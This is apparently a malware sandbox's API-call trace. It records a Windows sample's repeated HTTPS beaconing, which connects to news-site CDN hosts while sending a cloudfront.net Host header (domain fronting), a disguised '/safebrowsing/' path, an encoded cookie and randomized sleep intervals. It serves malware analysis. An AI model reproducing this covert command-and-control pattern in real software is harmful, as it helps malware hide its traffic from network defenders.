[0380.142] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0380.884] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0380.884] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0380.884] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0380.884] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x5, wMilliseconds=0xcb))
[0380.885] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0380.885] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0380.885] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x5, wMilliseconds=0xcb))
[0380.885] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383f08) returned 1
[0380.885] CryptGenRandom (in: hProv=0x383f08, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0380.885] CryptReleaseContext (hProv=0x383f08, dwFlags=0x0) returned 1
[0380.885] Sleep (dwMilliseconds=0x351a)
[0390.890] GetLastError () returned 0x0
[0390.890] SetLastError (dwErrCode=0x0)
[0390.890] GetLastError () returned 0x0
[0390.890] SetLastError (dwErrCode=0x0)
[0390.890] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0390.891] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0390.891] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0390.891] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0390.891] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] htonl (hostlong=0xa000000) returned 0xa
[0390.891] htonl (hostlong=0x22000000) returned 0x22
[0390.891] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] htonl (hostlong=0xa000000) returned 0xa
[0390.891] htonl (hostlong=0x47000000) returned 0x47
[0390.891] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] htonl (hostlong=0xa000000) returned 0xa
[0390.891] htonl (hostlong=0x1f000000) returned 0x1f
[0390.891] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] htonl (hostlong=0x7000000) returned 0x7
[0390.891] htonl (hostlong=0x0) returned 0x0
[0390.891] htonl (hostlong=0x8000000) returned 0x8
[0390.891] htonl (hostlong=0x2000000) returned 0x2
[0390.891] htonl (hostlong=0x8000000) returned 0x8
[0390.891] htonl (hostlong=0x6000000) returned 0x6
[0390.891] htonl (hostlong=0x6000000) returned 0x6
[0390.891] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] htonl (hostlong=0x0) returned 0x0
[0390.891] GetLastError () returned 0x0
[0390.891] SetLastError (dwErrCode=0x0)
[0390.891] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0390.891] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0390.891] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0390.891] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0391.606] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0391.606] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0391.606] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0391.606] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0xf, wMilliseconds=0x39e))
[0391.606] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0391.607] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0391.607] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0xf, wMilliseconds=0x39e))
[0391.607] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383f08) returned 1
[0391.607] CryptGenRandom (in: hProv=0x383f08, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0391.607] CryptReleaseContext (hProv=0x383f08, dwFlags=0x0) returned 1
[0391.607] Sleep (dwMilliseconds=0x3a4a)
[0401.607] GetLastError () returned 0x0
[0401.607] SetLastError (dwErrCode=0x0)
[0401.607] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0401.608] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0401.608] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0401.608] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] htonl (hostlong=0xa000000) returned 0xa
[0401.608] htonl (hostlong=0x22000000) returned 0x22
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] htonl (hostlong=0xa000000) returned 0xa
[0401.608] htonl (hostlong=0x47000000) returned 0x47
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] htonl (hostlong=0xa000000) returned 0xa
[0401.608] htonl (hostlong=0x1f000000) returned 0x1f
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] htonl (hostlong=0x7000000) returned 0x7
[0401.608] htonl (hostlong=0x0) returned 0x0
[0401.608] htonl (hostlong=0x8000000) returned 0x8
[0401.608] htonl (hostlong=0x2000000) returned 0x2
[0401.608] htonl (hostlong=0x8000000) returned 0x8
[0401.608] htonl (hostlong=0x6000000) returned 0x6
[0401.608] htonl (hostlong=0x6000000) returned 0x6
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] htonl (hostlong=0x0) returned 0x0
[0401.608] GetLastError () returned 0x0
[0401.608] SetLastError (dwErrCode=0x0)
[0401.608] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0401.608] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0401.608] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0401.608] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0402.304] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0402.304] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0402.304] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0402.304] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x1a, wMilliseconds=0x271))
[0402.304] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0402.304] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0402.304] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x1a, wMilliseconds=0x271))
[0402.304] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383798) returned 1
[0402.305] CryptGenRandom (in: hProv=0x383798, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0402.305] CryptReleaseContext (hProv=0x383798, dwFlags=0x0) returned 1
[0402.305] Sleep (dwMilliseconds=0x325a)
[0412.311] GetLastError () returned 0x0
[0412.311] SetLastError (dwErrCode=0x0)
[0412.311] GetLastError () returned 0x0
[0412.311] SetLastError (dwErrCode=0x0)
[0412.311] GetLastError () returned 0x0
[0412.311] SetLastError (dwErrCode=0x0)
[0412.311] GetLastError () returned 0x0
[0412.311] SetLastError (dwErrCode=0x0)
[0412.311] GetLastError () returned 0x0
[0412.311] SetLastError (dwErrCode=0x0)
[0412.311] GetLastError () returned 0x0
[0412.311] SetLastError (dwErrCode=0x0)
[0412.311] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0412.311] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0412.311] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0412.311] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0412.311] GetLastError () returned 0x0
[0412.311] SetLastError (dwErrCode=0x0)
[0412.311] htonl (hostlong=0xa000000) returned 0xa
[0412.311] htonl (hostlong=0x22000000) returned 0x22
[0412.311] GetLastError () returned 0x0
[0412.311] SetLastError (dwErrCode=0x0)
[0412.312] htonl (hostlong=0xa000000) returned 0xa
[0412.312] htonl (hostlong=0x47000000) returned 0x47
[0412.312] GetLastError () returned 0x0
[0412.312] SetLastError (dwErrCode=0x0)
[0412.312] htonl (hostlong=0xa000000) returned 0xa
[0412.312] htonl (hostlong=0x1f000000) returned 0x1f
[0412.312] GetLastError () returned 0x0
[0412.312] SetLastError (dwErrCode=0x0)
[0412.312] htonl (hostlong=0x7000000) returned 0x7
[0412.312] htonl (hostlong=0x0) returned 0x0
[0412.312] htonl (hostlong=0x8000000) returned 0x8
[0412.312] htonl (hostlong=0x2000000) returned 0x2
[0412.312] htonl (hostlong=0x8000000) returned 0x8
[0412.312] htonl (hostlong=0x6000000) returned 0x6
[0412.312] htonl (hostlong=0x6000000) returned 0x6
[0412.312] GetLastError () returned 0x0
[0412.312] SetLastError (dwErrCode=0x0)
[0412.312] htonl (hostlong=0x0) returned 0x0
[0412.312] GetLastError () returned 0x0
[0412.312] SetLastError (dwErrCode=0x0)
[0412.312] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0412.312] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0412.312] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0412.312] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0413.004] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0413.004] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0413.004] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0413.004] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x25, wMilliseconds=0x13e))
[0413.004] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0413.004] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0413.004] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x25, wMilliseconds=0x13e))
[0413.004] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3832d0) returned 1
[0413.005] CryptGenRandom (in: hProv=0x3832d0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0413.005] CryptReleaseContext (hProv=0x3832d0, dwFlags=0x0) returned 1
[0413.005] Sleep (dwMilliseconds=0x35c8)
[0423.027] GetLastError () returned 0x0
[0423.027] SetLastError (dwErrCode=0x0)
[0423.027] GetLastError () returned 0x0
[0423.027] SetLastError (dwErrCode=0x0)
[0423.027] GetLastError () returned 0x0
[0423.027] SetLastError (dwErrCode=0x0)
[0423.027] GetLastError () returned 0x0
[0423.027] SetLastError (dwErrCode=0x0)
[0423.027] GetLastError () returned 0x0
[0423.027] SetLastError (dwErrCode=0x0)
[0423.027] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0423.027] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0423.027] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0423.027] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0423.028] GetLastError () returned 0x0
[0423.028] SetLastError (dwErrCode=0x0)
[0423.028] htonl (hostlong=0xa000000) returned 0xa
[0423.028] htonl (hostlong=0x22000000) returned 0x22
[0423.028] GetLastError () returned 0x0
[0423.028] SetLastError (dwErrCode=0x0)
[0423.028] htonl (hostlong=0xa000000) returned 0xa
[0423.028] htonl (hostlong=0x47000000) returned 0x47
[0423.028] GetLastError () returned 0x0
[0423.028] SetLastError (dwErrCode=0x0)
[0423.028] htonl (hostlong=0xa000000) returned 0xa
[0423.028] htonl (hostlong=0x1f000000) returned 0x1f
[0423.028] GetLastError () returned 0x0
[0423.028] SetLastError (dwErrCode=0x0)
[0423.028] htonl (hostlong=0x7000000) returned 0x7
[0423.028] htonl (hostlong=0x0) returned 0x0
[0423.028] htonl (hostlong=0x8000000) returned 0x8
[0423.028] htonl (hostlong=0x2000000) returned 0x2
[0423.028] htonl (hostlong=0x8000000) returned 0x8
[0423.028] htonl (hostlong=0x6000000) returned 0x6
[0423.028] htonl (hostlong=0x6000000) returned 0x6
[0423.028] GetLastError () returned 0x0
[0423.028] SetLastError (dwErrCode=0x0)
[0423.028] htonl (hostlong=0x0) returned 0x0
[0423.028] GetLastError () returned 0x0
[0423.028] SetLastError (dwErrCode=0x0)
[0423.028] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0423.028] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0423.028] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0423.028] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0423.729] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0423.729] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0423.729] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0423.729] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x30, wMilliseconds=0x33))
[0423.729] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0423.729] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0423.729] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x30, wMilliseconds=0x33))
[0423.729] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383358) returned 1
[0423.729] CryptGenRandom (in: hProv=0x383358, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0423.729] CryptReleaseContext (hProv=0x383358, dwFlags=0x0) returned 1
[0423.729] Sleep (dwMilliseconds=0x3135)
[0433.733] GetLastError () returned 0x0
[0433.733] SetLastError (dwErrCode=0x0)
[0433.733] GetLastError () returned 0x0
[0433.733] SetLastError (dwErrCode=0x0)
[0433.733] GetLastError () returned 0x0
[0433.733] SetLastError (dwErrCode=0x0)
[0433.733] GetLastError () returned 0x0
[0433.733] SetLastError (dwErrCode=0x0)
[0433.733] GetLastError () returned 0x0
[0433.733] SetLastError (dwErrCode=0x0)
[0433.733] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0433.733] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0433.733] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0433.733] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0433.733] GetLastError () returned 0x0
[0433.733] SetLastError (dwErrCode=0x0)
[0433.733] htonl (hostlong=0xa000000) returned 0xa
[0433.733] htonl (hostlong=0x22000000) returned 0x22
[0433.733] GetLastError () returned 0x0
[0433.733] SetLastError (dwErrCode=0x0)
[0433.733] htonl (hostlong=0xa000000) returned 0xa
[0433.733] htonl (hostlong=0x47000000) returned 0x47
[0433.733] GetLastError () returned 0x0
[0433.734] SetLastError (dwErrCode=0x0)
[0433.734] htonl (hostlong=0xa000000) returned 0xa
[0433.734] htonl (hostlong=0x1f000000) returned 0x1f
[0433.734] GetLastError () returned 0x0
[0433.734] SetLastError (dwErrCode=0x0)
[0433.734] htonl (hostlong=0x7000000) returned 0x7
[0433.734] htonl (hostlong=0x0) returned 0x0
[0433.734] htonl (hostlong=0x8000000) returned 0x8
[0433.734] htonl (hostlong=0x2000000) returned 0x2
[0433.734] htonl (hostlong=0x8000000) returned 0x8
[0433.734] htonl (hostlong=0x6000000) returned 0x6
[0433.734] htonl (hostlong=0x6000000) returned 0x6
[0433.734] GetLastError () returned 0x0
[0433.734] SetLastError (dwErrCode=0x0)
[0433.734] htonl (hostlong=0x0) returned 0x0
[0433.734] GetLastError () returned 0x0
[0433.734] SetLastError (dwErrCode=0x0)
[0433.734] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0433.734] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0433.734] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0433.734] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0434.409] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0434.409] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0434.409] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0434.409] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x3a, wMilliseconds=0x2de))
[0434.409] InternetCloseHandle (hInternet=0xcc0008) returned 1
